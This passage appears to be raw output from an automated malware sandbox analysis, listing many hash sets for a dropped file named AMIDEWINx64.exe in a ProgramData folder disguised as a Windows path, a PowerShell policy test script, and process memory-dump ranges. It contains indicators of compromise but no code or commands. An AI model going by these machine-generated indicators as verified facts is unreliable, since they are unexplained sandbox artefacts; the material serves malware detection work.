| SHA256 | 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba |
| SHA512 | 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 6064c2834c891f83d68f0d53898276e5 |
| SHA1 | 64b9eebc545e6231e501ea68890f96357df6a70f |
| SHA256 | d92110871b5101e60e445c5b219fd6bea259968059cd3da59c83efa87e93a5b0 |
| SHA512 | b3e89f2318a3b2b77b406e0975a2721ae0837c99f62224fc03d3951e157cffc9a93ad62e1e46df50765878b7c9bf315b21b8597eec5e2c25dff0c9040ca1ccd8 |
memory/3492-140-0x0000000006150000-0x00000000061B6000-memory.dmp
memory/3492-141-0x00000000061C0000-0x0000000006226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1lot1q10.pwf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3492-145-0x0000000005330000-0x0000000005340000-memory.dmp
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 6abebe16db47d28f2821413d334c2a5e |
| SHA1 | 764e857a318eb27f8725d68a19dcca2e688acb23 |
| SHA256 | 4145432c3c3f12dda2c84966556c26dc1b023d4be0b481b68b5ea3c8eeeae800 |
| SHA512 | 351ca60d0b6cbecc7154071f5c7962cf053481e77c22163715f85303fa09c779e6684b566acfd54a484a0f84cb53cb775d21fdf8bd0314eec6ada377b62073ed |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | d927f633875ee89526ef7ac056c6e66d |
| SHA1 | fef60acf1469b6c29f273dcf1c2f6b8327485d98 |
| SHA256 | 5828c51b5300306e97ce2eda512c2729e4d97f5f630228d0b2e0d54f8611919a |
| SHA512 | bca25c4c4f371da16c0a89e7f27f11cf33a87819fdb4b946b0824b32ac24fbf6438fbb48f69e5b0041a00c0142e23f996a84ab62f8b15af2d6804b8acfa75ed7 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 3848e0e3fe4e7e03db0c9b9a5f670002 |
| SHA1 | 52feed500d2d1caa724987af52ce74ab2f6d7e04 |
| SHA256 | e825517678ebfc3747b0860f04e3e106869519010cb6347e73ab9bc8e97a4570 |
| SHA512 | db20a160edc750755f68291c4404b464c4f3f10dd49939e2d0004fbb02f0b58cc2783f01a0fdf6d51dbc3a77eff8290c783d9d448465dd6bfec4bbe839d4ba3b |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | b643646ef5d02ef734c0450fc3adfd70 |
| SHA1 | b5c811dc9f1bfd55ead0875b5b25b6c2256e0740 |
| SHA256 | 030b4e46f31ce7c4b5e61d69e69ef2da19abe8b8f7a9b069fa174f5741f141f9 |
| SHA512 | cbfa1f6329519a415e88af9d2e0c219ffacbabd598473fee119af07bcbad22b6cc9bb12f378ca6654d194e48969db57474ec97b7d2d285a766ee8609ee6bba97 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 4019a6a1053e882638fd8f9e0e0f24ff |
| SHA1 | 66524a7d5c2d5810d8d42d15ae1550a0be057236 |
| SHA256 | 5b088a7b3a23014909ce2d21980cd05b889517f28942783aa9e75d50c4a216bd |
| SHA512 | b1e96ed732ed243c98f8b9e784fd453c5c7f87ea8823ad2c18fe3b9d8c9751790953fc0d77513a18071698c4010a519a45cd24267800e10f5679f47fca394683 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 228a117c9235cf9b85bda4b8a48920de |
| SHA1 | 4a40f02be3bc92f9bf60490c4cc3a47864a6c6a0 |
| SHA256 | 44d56e4b20543828f761f8639f0dd20f765d843921a2d3d53ba76320eedbe013 |
| SHA512 | dd7a938fb83d2529357dce4677e4362f74b80588a3734a9aff2d9df388716f23c33fa214d698a81ec9f015412d5ccb4d284756d64e878bcd1fbe8bc0652febcc |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | f4f2a7a6a7937027c25715302c077296 |
| SHA1 | 23661fee384a6c3652293f10b6c9b3f7722e56d6 |
| SHA256 | 8fa24bd136d0e4e92fb67a21444097e35bda1f8f68ecc36602f28f5a6e5ba68d |
| SHA512 | 369cbfb4d3023c373b96e266890735b147ed081fc1e0f5dbc5a25aa75496993816a448001bf295d7faeb0864068af6a3105165bd690a80fa2432b08487cd4563 |
memory/4352-154-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/1344-152-0x00007FFB12820000-0x00007FFB12821000-memory.dmp
memory/3492-151-0x0000000005330000-0x0000000005340000-memory.dmp
memory/1344-144-0x0000000002BB0000-0x0000000002BC8000-memory.dmp
memory/1344-142-0x0000000002CA0000-0x0000000002CF0000-memory.dmp
memory/3492-165-0x0000000006230000-0x0000000006584000-memory.dmp
memory/4352-166-0x000000001BC30000-0x000000001BC40000-memory.dmp
memory/4352-169-0x000000001C850000-0x000000001C902000-memory.dmp
memory/5032-173-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/1344-172-0x00007FFB12810000-0x00007FFB12811000-memory.dmp
memory/1344-171-0x00000000013C0000-0x00000000013CE000-memory.dmp
memory/1344-174-0x00007FFB12800000-0x00007FFB12801000-memory.dmp
memory/1344-175-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/1344-177-0x00000000013D0000-0x00000000013DE000-memory.dmp
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | f3e8d7840586713b078693a5a987ce59 |
| SHA1 | 9d7e6f2ee81ed20f6c8fb711fd3596c33215781f |
| SHA256 | 7e4151e888b862f08063a6d2761d3fbe4d974109481a8c96581b432987661b07 |
| SHA512 | 8cbeeed1817b8f36f4221c0d27009bd1c9e7911225138ca4e900d639ab32bc8a467615e0bbac9e7324a746f272ec66593720f55d718701001e77503af88e8b5f |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 156ee4c7360019a6ff752d60c7bea101 |
| SHA1 | 669dd480f93ee1455015af3ea6763ded4d644bbb |
| SHA256 | b0dc11da0d40d71a1fcb2198b3ef05c67496e3cdecd0c42e1ba14fb1485483f9 |
| SHA512 | 7296ceacd485ca6180e8d382ed5ddbb0a429a579e80d8759e66322a436b51a8340b052f7e36a645be63cadee01246ada9e2df53eeffa63e09aa879a22a0bbc36 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 107849659ee011a1a3181b7c8783c6bd |
| SHA1 | 785e03f6c4afd76cedee66ad518e30ff455a016d |
| SHA256 | 251848a200f3b031b8c10dd1db6b7f8aebf6e42ba776e2f7d200319833668723 |
| SHA512 | 05ab7de318bf0cfa6b56df6da4c9ae7d88cfda0dceb535f5f699f1ec139f9287a4c883da6cf15f43eacba50b88209cb528400ceafc1a04c3c3e0471682d42468 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 0aad96ec957b53b4c429da2392b4dd01 |
| SHA1 | 81a89220fd5e675c8b37ab8578b5bcfae34d5de4 |
| SHA256 | 99d68ff14fea6bfd58a3f1e917b7a6d645a0034767c846ac79c2e87f0aca6bc2 |
| SHA512 | 4a3c86ca21b3c156cd109e906a59fcc1e5683f83fb88971d3dd48a44783e9cdc9eea8bc72e6a5dd17282317e363d0b16c458420f4ca414b170002968b7652d3d |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 1875de8d045e98ee6e4c51dab537f31a |
| SHA1 | 909abc7217b8331dfb933cd3fd72e39f86d394bd |
| SHA256 | 8fdf22521114586967e2348723026de8268e1812c85f395d2b7d5533f07e1fd1 |
| SHA512 | 1e4ffb29f6655d70ba50a55949a5175f29a2d3829f3db852f4ca6f40465979c34cfa52d0b397ca2c4dd4d493657601b98b6e7cf9b6038ed69f7494733a1dbe50 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 89bb9df2e7d9c56e3ddd3c7ba5a68c61 |
| SHA1 | 68d0d6f5b3ebb4b3afd95d972c53d606b1f3f376 |
| SHA256 | c3d58e2d4fe46b0b49382f238ebbbe6fca46443e5ada58422b42ccfddbf2249b |
| SHA512 | 66376d5a8232ad96dba5abf25bd9f5635250025002a5c92ee2c9891288f393614c3b00a807b8a614ac043e94fca322787263bdd356fff7bc7588ba507a0efc1e |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 2e1519e24e06a4a16e016f17c2e3afb9 |
| SHA1 | 991da87bc39b1181dfd4166008e569e2f0815941 |
| SHA256 | 28989074071103f50feb660fab0c7eb8378e09a609e9549b7d6e66363c7eaf73 |
| SHA512 | 834275614fcc598e3f05152e980f1504ad10b9d5cdad20a18dc14e5c2e1e888e15b5dc71b59ca29c7f1cc8c4fcd9342bf92a09f303d99dde59fc2920a2db0b3a |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 5ac891f618d3077e99485c3ad2987042 |
| SHA1 | 7a4177bbadf374db1d72184a9e704881d401538b |
| SHA256 | f5fe98111cf444e54a481b7e6ccd4c2115224b85febb14bc3235100e116e707e |
| SHA512 | f4ede75106e16505699d7ef5432e2ffeb4ca2eef596f473b093cf6fa78f7bbe4efc8abaa5e63a7d031c0abb5cce42dcc63721b696895cf8c7dba3ae4cd2c8772 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 1388617b559e500a2b36b66268302504 |
| SHA1 | 2f789d40481c541b89113048af8778406b347189 |
| SHA256 | 7376756cfb4e2b1d7e8f78916fcfa0095ab1facaa9ca9f75ccfd9b01ceb5cee6 |
| SHA512 | c1e4aee7f76f10ab27a3921224b7ee68880e5b8723a947cc328565536371ee4a91f5ab7e29cdbc4b1223f73338f278f54851dd95197cbaa859ba401663b341cf |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | adf11cb401c3dce975dee0bdd3ae4c3a |
| SHA1 | 455c3f9daf0f5f9b74fbad9ea4595dff6c28702d |
| SHA256 | f11b0ffa2581898f7b373dc0ed67805ca3daaa3b270371eff1e7b8cc5c240f79 |
| SHA512 | 283425de9e5c09c0122296b77b001af90e8ef11d3af64e5cc5065f325b3040d7e0a90b74097553e29e5fa7a2d523deb9527c12625ee59736e99714841f009a51 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | d15c45f96ce83996328f945645e89801 |
| SHA1 | 092c0d354d81e9c14c8458e2ee60b884590fa9ee |
| SHA256 | be6832e2d3b562873f0460c0327edad3011de5bcf86a64dd6635fdc2f875095d |
| SHA512 | 0ad71f0119eccb8af738207090573f1f8c1a6bd1d8e7e54deb285fe1e12a3bd230dc8c04d68ab42952a420563bbe4fb3f319806a6c455b58bebbedac05e1d2ca |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 5e59c95d4051e2a6444a26754d91bb1e |
| SHA1 | 5312196b8586a8981745d0a3b1676ba8694de3b8 |
| SHA256 | f58a8a889bbd66f3d72025f72a020acc730f730f744abc2d6c529e987ce1ef71 |
| SHA512 | 64ec3dd7cfcf88a0aab4572bcffdbc6b0094d300c147011202651639c539feab80c59d4093d2d630230f6aa4b7b1b3546bfd6563107983ffbcac7f0f9254f754 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 78cb2ced80b117c183f1cd18124514db |
| SHA1 | 32624518833a0c463d72ef86147b61116de49f3f |
| SHA256 | 9dbeafaef60f71a96968f633f1081b0cdd8ab116732675245f6b92c7725da753 |
| SHA512 | 827f6095d7532f948b80ab4b40fd1a2f25a4820639995cc9c08406cf14c697154e29ca97a5829a36ee4ebb6246484ea53d54633176a016ad9fa4358f7bd0a288 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 5a6e07c849e94e7b9b07afdff0663edb |
| SHA1 | c46b6dd938898fce414a1baaa508c5942f439072 |
| SHA256 | 311db8983083acb5b530aceb300c211d0df59b70f04928da489b21c461bf43fb |
| SHA512 | 27ca568009938da8e3246a27ace52aff366b42c52b7c55854cd2e1439a4a82588567ab5f15c09966288743a42fc104ce7c517781c8331da9b202143155b1819a |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 07fc85a4698f2914fd2055f0015f5743 |
| SHA1 | 0af853dd90ffaf24337c6bbb30cf211bd7f530fb |
| SHA256 | 3c0ffba54e4c83fa3d007fba6ef1d4000fa912235cb524dc03bfae28dee6e6de |
| SHA512 | 6dd735ee2a161fd1e173b11676187d618b71c2ded607caffb49e9f2f3b5c309e1cd58b43f8b01e4801bca727f9c147d5b75a49d8a630ff20377bb31673458f2c |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | ec582e131f6a9176796c84631c973eff |
| SHA1 | 9640f38ff73e5ec7cee1e91b52c1aad5e239bcf1 |
| SHA256 | 57cfb33838276b98a5e4023f4e03fb0f157097a663e6c100e6c1dcd53e642248 |
| SHA512 | 6b8d4f565fd8dbf31ffebf88a493ab11e6f9a1cf787c5a29c94f96382d076c17b3c1efb9d0d9d5b89e6b612e5b34014c40981624b7dc2438d270052849dd42e0 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 6a0b6d7935e5cbb592cb234069ee5b98 |
| SHA1 | ba8171e9e2074041ca2b004b78843463685ae0ef |
| SHA256 | 278e54b721116a75c3331c8b7db35d8e1837a22e7b76cb2c6ab1a0e7033e8a14 |
| SHA512 | dce98baf411651d12e9bc99564826c55175ec2bcc68667ad9bb205e233e0e75ae3772a40ef308aac0387e29d3cc156c4b53ee90fb358e5c2956164f10c03dbd7 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 7f3ca8da328adf4ee199d188a8a9b49d |
| SHA1 | e70c055b705c5f8b633286e9cdddf18c71998c71 |
| SHA256 | 110552a4c4a818830d7256cef57a5e4105f6b504f162ef6d826da6d6dc3ee20e |
| SHA512 | 7b977c725eadb495c00fd3c261661d42be375aeac2388f44516c4636b5203af87d281b46d73a41ab9d943fc9e7d99188d96d4ce0adbccff1bfde59ae84fcb39c |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 650f4697c7279b993255b73860a5fa2f |
| SHA1 | 3f87d745543994006776c82137e685ea11ae7815 |
| SHA256 | 76c87343f56b61b52e0abb4b1438450163411aa5f419b214aa58457f6bafcccc |
| SHA512 | a0a3b416cbd08c3e26a6db47fcb4143577be01908e73eaa06d70b0bd52e7771e5fc98e8672254ca39d7aa1b00b4f939ea4c56fefa9ee0783a6fa5ecf3423de46 |
memory/1344-198-0x00007FFB127F0000-0x00007FFB127F1000-memory.dmp
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | e24709e7be2e570bf39160b7edb5240b |
| SHA1 | 6baccdd6f86d8a57588781b7f7f2dbe20b02bd90 |
| SHA256 | 14ec741c4d39619a8abf12578142874d92523e60b6cc74d02a532dbeb8d31b7b |
| SHA512 | 040d6427d5a4c2017008a219a53a6424ffd4a8dd2c87b4ba41116ae3aa7531d279cf33f7dfe7fc3ed4e04a7ade1c6f00a750d50d4b458dcf7a442ba453025380 |
memory/1344-200-0x0000000002C10000-0x0000000002C1C000-memory.dmp
memory/1344-201-0x00007FFB127E0000-0x00007FFB127E1000-memory.dmp
memory/1344-204-0x0000000002C20000-0x0000000002C2E000-memory.dmp
memory/1344-205-0x00007FFB127D0000-0x00007FFB127D1000-memory.dmp
memory/2356-217-0x0000017E69B80000-0x0000017E69B90000-memory.dmp
memory/1344-219-0x0000000002C30000-0x0000000002C3C000-memory.dmp
memory/2356-216-0x0000017E69B80000-0x0000017E69B90000-memory.dmp
memory/2356-215-0x00007FFAF2F80000-0x00007FFAF3A41000-memory.dmp
memory/3492-220-0x0000000006000000-0x000000000601E000-memory.dmp
memory/1344-221-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/1344-222-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/1344-225-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/1344-224-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/1344-223-0x0000000002C40000-0x0000000002C50000-memory.dmp
memory/2364-284-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2364-288-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2364-289-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2364-291-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2364-286-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2364-285-0x0000000140000000-0x000000014000E000-memory.dmp